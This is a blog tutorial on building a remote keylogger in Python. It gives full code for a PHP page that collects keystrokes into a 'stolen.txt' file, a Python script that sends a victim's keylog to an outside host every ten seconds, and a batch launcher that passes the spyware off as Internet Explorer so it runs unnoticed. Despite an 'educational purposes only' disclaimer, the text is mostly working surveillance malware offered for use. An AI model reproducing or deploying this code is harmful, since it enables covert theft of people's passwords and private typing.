Remote Keylogger in Python [How To]

Hey geeks! How are you doing?

Some weeks ago we wrote about How to Write A Keylogger in Python. If you haven't checked it out yet, well, do it!

In this post, we will convert this local keylogger into a remote keylogger. We will talk about modifying the above keyloggger and use it to send the logged information to a remote server, from where you can easily see what all characters were typed by the person on whose system the keylogger was running.

NOTE: The following tutorial is for educational purposes only. It is to make people aware about security, and to convey how easy it is to obtain private information from a system. We will not be held responsible for ANY malicious usage whatsoever. DO NOT TRY THIS AT HOME OR ANYWHERE ELSE!

The script that we wrote in the above mentioned post just logs the keystrokes into a file on the victim's computer. Now, we can use some more scripts written in python and php to send these logs to a website. If you don't own a website, don't worry. You can get one at  000webhost.com. We will not go into the details on how to do so, as the website itself provides a very user-friendly interface.



=>Go to the cPanel of your website. Open the File Manager, after logging in by entering the required username and password.

=>Go to public_html folder and create a new file. Let's call it collect.php. Now paste the following code in collect.php and save it:

<?php

$collectedData = $_GET["keylog"];

$file = fopen('stolen.txt','a');

fwrite($file,$collectedData.'\n\n');
fclose($file);

echo '<b>Sorry , this page is under construction</b></br></br>Please Click<a
href="http://www.google.com/">here</a> to go back to previous page ';
?>

 

=>Now, create another file named stolen.txt. This file will contain the contents of the keylog.txt file that is present on the victim's computer.

=>Now, the only thing left is, to send the contents of the keylog file to the above php page, so that it appends the required contents to stolen.txt file present on our website. Create a new file named send.pyw and place it in the same folder as the one that contains the remoteKeylogger.pyw file. Paste the following code into send.pyw file:

import urllib2
import urllib
from time import sleep
import ssl

ssl._create_default_https_context = ssl._create_unverified_context
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0'}
        
        
f = open('keylog.txt','r')
while True:
        sleep(10)
        data = f.read() 
        info = {'keylog':data}
        info = urllib.urlencode(info)
        print(info)
        url = 'http://emailanonymous.netne.net/collect.php?keylog='+info
        
        req = urllib2.Request(url,headers = headers)
        resp = urllib2.urlopen(req)
        print("SENT\n\n")
        
        print("URL: ",resp.geturl())

f.close()

This file will simply read the contents of keylog.txt file after every 10 seconds and send it to our php page by encoding it into the url.

=>Now, remove the launch.bat file and create a new launch.bat file that contains the following code:

@echo off
start "" ".\keylogger.pyw"
start "" ".\send.pyw"
start "" "C:\Program Files\Internet Explorer\iexplore.exe"

And it's done! Now, whenever a user opens up our "malicious" Internet explorer, our keylogging and sending scripts will launch themselves in background, without anyone's knowledge. Below is a screenshot of a sample stolen.txt file:

 

The above example shows how small programs can do big things. Of course, there is a large room for improvement in this application, so do share with us if you can "fix" some bugs in it. Once again, do NOT use it for wrong purposes, you will be responsible for anything you do with it!

PS: Thanks to this YouTube video for teaching me how to write a local keylogger and to encourage me to write this remote keylogger.

Please comment below for further queries, suggestions or improvements. :)